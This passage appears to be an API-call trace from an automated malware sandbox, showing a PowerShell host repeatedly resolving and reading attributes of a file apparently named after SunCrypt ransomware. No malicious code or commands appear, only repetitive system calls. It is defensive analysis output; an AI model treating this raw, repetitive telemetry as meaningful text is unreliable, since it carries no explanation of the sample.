nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.642] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.645] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701646212106) returned 1 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] EtwEventActivityIdControl () returned 0x0 [0103.646] CoCreateGuid (in: 
pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbb3fd6c4, Data2=0x57e0, Data3=0x4a7a, Data4=([0]=0xaa, [1]=0xd4, [2]=0x64, [3]=0xf1, [4]=0x0, [5]=0xa1, [6]=0x83, [7]=0x9a))) returned 0x0 [0103.647] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.647] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701646373791) returned 1 [0103.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.647] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.648] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.650] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701646816100) returned 1 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] EtwEventActivityIdControl () returned 0x0 [0103.652] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x41aea648, Data2=0x70fc, Data3=0x41c7, Data4=([0]=0xad, [1]=0x44, [2]=0x49, [3]=0xe1, [4]=0xff, [5]=0x71, [6]=0xeb, [7]=0x6))) returned 0x0 [0103.653] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.653] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701646983349) returned 1 [0103.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.656] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701647221380) returned 1 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2dda1508, Data2=0x5c12, Data3=0x4613, Data4=([0]=0xb3, [1]=0x62, [2]=0xae, [3]=0x0, [4]=0x67, [5]=0xb0, [6]=0xed, [7]=0xcd))) returned 0x0 [0103.657] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.657] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701647372514) returned 1 [0103.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.660] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701647690253) returned 1 [0103.660] EtwEventActivityIdControl () returned 0x0 [0103.661] EtwEventActivityIdControl () returned 0x0 [0103.661] EtwEventActivityIdControl () returned 0x0 [0103.661] EtwEventActivityIdControl () returned 0x0 [0103.661] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x96b39e3c, Data2=0xa5b2, Data3=0x4de9, Data4=([0]=0x85, [1]=0x5e, [2]=0x73, [3]=0x4d, [4]=0xfe, [5]=0x8, [6]=0x3a, [7]=0xb0))) returned 0x0 [0103.662] 
GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.662] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701647844600) returned 1 [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.662] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a 
[0103.664] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701648077595) returned 1 [0103.664] EtwEventActivityIdControl () returned 0x0 [0103.664] EtwEventActivityIdControl () returned 0x0 [0103.664] EtwEventActivityIdControl () returned 0x0 [0103.665] EtwEventActivityIdControl () returned 0x0 [0103.665] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x37920232, Data2=0x726b, Data3=0x4bb8, Data4=([0]=0x81, [1]=0x8c, [2]=0x5a, [3]=0xd8, [4]=0xd5, [5]=0x37, [6]=0x68, [7]=0x2f))) returned 0x0 [0103.665] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.665] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701648207033) returned 1 [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) 
returned 1 [0103.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.669] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701648534579) returned 1 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1ce54fb0, Data2=0x11e1, Data3=0x471e, Data4=([0]=0xbc, [1]=0x50, [2]=0xae, [3]=0x5b, [4]=0x13, [5]=0x85, [6]=0x74, [7]=0x5a))) returned 0x0 [0103.670] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.670] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701648687904) returned 1 [0103.670] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.670] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.671] 
GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.681] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701649806117) returned 1 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x273c55d0, Data2=0x5141, Data3=0x4a1b, Data4=([0]=0x8b, [1]=0x72, [2]=0xa6, [3]=0xc9, [4]=0xb9, [5]=0x8d, [6]=0x30, [7]=0x5b))) returned 0x0 [0103.682] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.683] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701649928761) returned 1 
[0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.686] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701650238479) returned 1 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] 
EtwEventActivityIdControl () returned 0x0 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x492e694a, Data2=0xf292, Data3=0x4e32, Data4=([0]=0xa0, [1]=0x5a, [2]=0xbf, [3]=0x90, [4]=0x29, [5]=0x37, [6]=0xa6, [7]=0x30))) returned 0x0 [0103.687] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.687] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701650402345) returned 1 [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.688] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 
lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.693] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701650954977) returned 1 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdf978609, Data2=0xa7bf, Data3=0x46d7, Data4=([0]=0x93, [1]=0x5c, [2]=0xc3, [3]=0xe6, [4]=0x29, [5]=0x7e, [6]=0x19, [7]=0x33))) returned 0x0 [0103.694] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.694] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701651096706) returned 1 [0103.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, 